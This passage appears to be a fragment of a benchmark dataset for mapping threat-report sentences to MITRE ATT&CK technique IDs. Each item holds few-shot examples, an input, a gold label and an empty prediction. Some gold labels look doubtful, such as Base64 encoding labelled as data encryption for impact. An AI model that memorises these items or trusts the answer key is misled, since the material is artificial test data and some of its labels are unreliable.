CreateWindowEx.", "gold": "- T1056.004: Input Capture - Credential API Hooking", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1574.013: Hijack Execution Flow - KernelCallbackTable\n\t - T1620: Reflective Code Loading\n- Text: PLATINUM has used the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.\n\t - T1095: Non-Application Layer Protocol\n- Text: The \"ZJ\" variant of BACKSPACE allows \"ZJ link\" infections with Internet access to relay traffic from \"ZJ listen\" to a command server.\n\t - T1090.001: Proxy - Internal Proxy\n", "input": "\nThe most interesting part is the decrypted C&C configuration, as can be seen in the image below", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DustySky captures PNG screenshots of the main screen.\n\t - T1113: Screen Capture\n- Text: is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate\n\t - T1115: Clipboard Data\n- Text: The goal of targeting some victims appears to be to obtain data. How this data is obtained likely differs per victim, but we observed the usage of several custom DLL files used to continuously retrieve data from memory of systems where such data is typically processed\n\t - T1119: Automated Collection\n", "input": "\nA variant takes screenshots by simulating the user pressing the \"Take Screenshot\" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Conti uses a multithreading technique to fast encrypt all the files. This routine takes seconds to just a few minutes depending on the number of files on the machine. Each sample has a unique extension that the malware adds to the encrypted files. While using Cybereason with prevention mode off to allow investigation of the ransomware execution, it is possible to see the encryption activity and the creation of new files\n\t - T1486: Data Encrypted for Impact\n- Text: SideTwist has used Base64 for encoded C2 traffic.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: encodes C2 traffic with Base64.\n\t - T1132: Data Encoding\n", "input": "\nencrypts data using Base64 before being sent to the command and control server.", "gold": "- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator\u2019s account.\n\t - T1098: Account Manipulation\n- Text: APT29 has granted `company administrator` privileges to a newly created service principal.\n\t - T1098.003: Account Manipulation - Additional Cloud Roles\n- Text: Emotet occasionally takes a break from delivering malicious emails. Emotet's longest absence from the threat landscape occurred in early February 2020 and lasted more than five months. Emotet resumed operations in mid-July 2020, and it quickly surpassed other threats in sheer volume of malicious spam.\n\t - T1098.002: Account Manipulation - Additional Email Delegate Permissions\n\t - T1566: Phishing\n", "input": "\nadds permissions and remote logins to all users.", "gold": "- T1098: Account Manipulation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SoreFang can enumerate domain groups by executing \"net.exe group /domain\".\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.\n\t - T1087.001: Account Discovery - Local Account\n- Text: The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine\u2019s user is in the admin or domain admin group\n\t - T1087.002: Account Discovery - Domain Account\n", "input": "\nmay collect user account information by running net user /domain or a series of other commands on a victim.", "gold": "- T1087: Account Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SpicyOmelette can identify the IP of a compromised system.\n\t - T1016: System Network Configuration Discovery\n- Text: Andariel has limited its watering hole attacks to specific IP address ranges.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n- Text: can obtain a list of active connections and open ports.\n\t - T1049: System Network Connections Discovery\n", "input": "\ngathers the local IP address.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses a custom binary protocol to beacon back to its C2 server. It has also used XOR for encrypting communications.\n\t - T1095: Non-Application Layer Protocol\n- Text: CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: TechnoCreep is a previously undocumented C# backdoor that communicates with a C&C server via TCP sockets. In this case, commands are not read from a file, but received in an exchange of messages\n\t - T1071: Application Layer Protocol\n", "input": "\nBUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: iKitten prompts the user for their credentials.\n\t - T1056.002: Input Capture - GUI Input Capture\n- Text: Remcos has a command for keylogging.\n\t - T1056.001: Input Capture - Keylogging\n- Text: At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its \u201cRecordToFile\u201d file stealer method\n\t - T1056.004: Input Capture - Credential API Hooking\n", "input": "\nis capable of capturing keystrokes on victims.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attack Flow and Exfiltration After injecting into the targeted processes, the modules continue their malicious activity through those processes\n\t - T1055: Process Injection\n\t - T1057: Process Discovery\n- Text: Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe.\n\t - T1055.004: Process Injection - Asynchronous Procedure Call\n", "input": "\nperforms code injection injecting its own functions to browser processes.", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Escalate Privileges APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes\n\t - T1003: OS Credential Dumping\n\t - T1068: Exploitation for Privilege Escalation\n- Text: Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it\u2019s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections\n\t - T1210: Exploitation of Remote Services\n- Text: The first spear phish from group \u201cAdmin@338\u201d was sent to a foreign government in the Asian Pacific region on March 10, 2014 \u2013 just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, \u201cMalaysian Airlines MH370.doc\u201d (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of \u201cdecoy content\u201d upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1203: Exploitation for Client Execution\n\t - T1566: Phishing\n", "input": "\nhas used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.", "gold": "- T1068: Exploitation for Privilege Escalation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.\n\t - T1036.003: Masquerading - Rename System Utilities\n- Text: Ryuk has constructed legitimate appearing installation folder paths by calling \"GetWindowsDirectoryW\" and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as \"C:\\Users\\Public\".\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Kimsuky has disguised services to appear as benign software or related to operating system functions.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", "input": "\nC:\\Windows\\System32\\utilman.exe", "gold": "- T1546.008: Event Triggered Execution - Accessibility Features", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can spawn processes with alternate PPIDs.\n\t - T1134.004: Access Token Manipulation - Parent PID Spoofing\n- Text: PoshC2 can use Invoke-RunAs to make tokens.\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: is capable of loading executable code via process hollowing.\n\t - T1055.012: Process Injection - Process Hollowing\n", "input": "\nIt is created as a separate process instead of child process of Office applications", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aside from security programs and other programs used daily that can be used to profile its targets, the DUBNIUM malware also checks for various program analysis tools including Pin and DynamoRIO. It also checks for a virtual machine environment. If some of these are detected, it quits its execution. Overall, the malware is very cautious and deterministic in running its main code\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)\n\t - T1047: Windows Management Instrumentation\n- Text: Turla has used WMI event filters and consumers to establish persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n", "input": "\nThis suggests that other WMI-based VM detection techniques may also detect certain physical systems if those systems do not support the specific WMI query", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: runs the whoami and query user commands.\n\t - T1033: System Owner/User Discovery\n- Text: APT28 has split archived exfiltration files into chunks smaller than 1MB.\n\t - T1030: Data Transfer Size Limits\n- Text: STARWHALE can exfiltrate collected data to its C2 servers.\n\t - T1041: Exfiltration Over C2 Channel\n", "input": "\nAlso, this variant of OopsIE uses the output of the whoami command as the parameter within the URL when communicating with the C2 server, which differs from the previous OopsIE variant that used the hostname and username from the environment variables", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: steals credentials from compromised hosts. 's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by include ones associated with The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, Internet Explorer, Microsoft Outlook, WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).\n\t - T1003: OS Credential Dumping\n- Text: Astaroth uses a software packer called Pe123\\RPolyCryptor.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords.\n\t - T1555: Credentials from Password Stores\n", "input": "\nFigure 2: APT39 attack lifecycle There are some indications that APT39 demonstrated a penchant for operational security to bypass detection efforts by network defenders, including the use of a modified version of Mimikatz that was repacked to thwart anti-virus detection in one case, as well as another instance when after gaining initial access APT39 performed credential harvesting outside of a compromised entity's environment to avoid detection", "gold": "- T1070.004: Indicator Removal - File Deletion\n- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When one PlugX succeeds to infect a host, it then accesses to every IP address in the local network one-by-one and communicate with any connectable nodes, using one of the following protocols listed in Table 2\n\t - T1016: System Network Configuration Discovery\n\t - T1008: Fallback Channels\n- Text: Andariel has limited its watering hole attacks to specific IP address ranges.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n- Text: Flagpro has been used to execute \"net view\" on a targeted system.\n\t - T1018: Remote System Discovery\n", "input": "\nobtains the target's IP address and local network segment.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For example, the following string would be included in one of the HTTP parameters sent to the C2 server: eRmaVsr90D-7Ig1ngV3PkdouzP974 In this specific case, the actor made a mistake when configuring this XAgent sample with its C2 locations\n\t - T1071: Application Layer Protocol\n\t - T1008: Fallback Channels\n- Text: Grandoreiro\u2019s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve\n\t - T1568: Dynamic Resolution\n", "input": "\nhas a hard-coded primary and backup C2 string.", "gold": "- T1008: Fallback Channels", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: POWERSTATS can sleep for a given number of seconds.\n\t - T1029: Scheduled Transfer\n- Text: can capture the victim's screen.\n\t - T1113: Screen Capture\n", "input": "\nWe are not sure if this works, but the command name would suggest it is meant to take a screenshot $command Runs a PowerShell command and sends the output to the C2 slp:\\d+ Sets the sleep interval between C2 beacons $testmode Issues DNS queries of A, AAAA, AC, CNAME, MX, TXT, SRV and SOA types to the C2 servers attempting to determine which DNS query types were successful", "gold": "- T1071: Application Layer Protocol\n- T1571: Non-Standard Port\n- T1008: Fallback Channels\n- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Sibot has installed a second-stage script in the \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\" registry key.\n\t - T1112: Modify Registry\n- Text: LoudMiner can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nSome variants establish persistence by modifying the Registry key HKU\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:%appdata%\\NeutralApp\\NeutralApp.exe.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aria-body has the ability to execute a process using \"runas\".\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.\n\t - T1134: Access Token Manipulation\n- Text: parses the export tables of system DLLs to locate and call various Windows API functions.\n\t - T1106: Native API\n", "input": "\nAnalyzing Gold Dragon As part of its initialization, Gold Dragon: Builds its imports by dynamically loading multiple APIs from multiple libraries Gains debug privileges (\u201cSeDebugPrivilege\u201d) for its own process to read remote memory residing in other processes The malware does not establish persistence for itself but for another component (if it is found) on the system: The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system", "gold": "- T1055: Process Injection\n- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SeaDuke is capable of uploading and downloading files.\n\t - T1105: Ingress Tool Transfer\n- Text: Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Dipsind can spawn remote shells.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nCode comparison between the default batch script issued by Poison Frog\u2019s C2 and a batch script received by the Helminth Trojan Webshells The data dump included several different webshells apparently used by OilRig to interact with compromised servers", "gold": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1064: Scripting\n- Text: Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\\test.bat ^>c:\\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs\n\t - T1053.002: Scheduled Task/Job - At\n- Text: This DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe, allowing it to remain persistent after reboot\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\nIn most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup", "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Process name, service name, and driver path listings are obtained, and each value is hashed via the FNV-1a + XOR algorithm as described previously and checked against hardcoded blocklists. Some of these hashes have been brute force reversed as part of this analysis, showing that these routines are scanning for analysis tools and antivirus engine components. If a blocklisted process is found the Update routine exits and the sample will continue to try executing the routine until the blocklist passes. Some entries in the service list if found on the system may affect the DGA algorithms behavior in terms of the values generated. The list of stopped services is then bit-packed into the ReportWatcherPostpone key of the appSettings entry for the samples\u2019 config file. The sample retrieves a driver listing via the WMI query Select * From Win32_SystemDriver\n\t - T1057: Process Discovery\n- Text: If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. However, if the malware is successful in elevating privileges, it begins to enumerate existing Windows services on the host that are configured to run as LocalSystem. The malware selects services that are currently not active and ignores services that launch the executables svchost.exe and lsass.exe. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the /reset flag to reset the executable\u2019s permissions, then using takeown.exe with the /F flag to take ownership of the executable\n\t - T1007: System Service Discovery\n- Text: KOMPROGO is capable of creating a reverse shell.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nsurveys a system upon check-in to discover running processes using the tasklist /v command.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BLINDINGCAN has deleted itself and associated artifacts from victim machines.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Lucifer can clear and remove event logs.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: Magic Hound has removed mailbox export requests from compromised Exchange servers.\n\t - T1070.003: Indicator Removal - Clear Command History\n", "input": "\nOnce they are deleted by the attackers\u2019 code, there is nothing left to be forensically recovered.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: REvil can use WMI to monitor for and kill specific processes listed in its configuration file.\n\t - T1047: Windows Management Instrumentation\n- Text: ROKRAT can access the \"HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData\" Registry key to obtain the System manufacturer value to identify the machine type.\n\t - T1012: Query Registry\n", "input": "\ninstaller uses WMI to search for antivirus display names.", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant 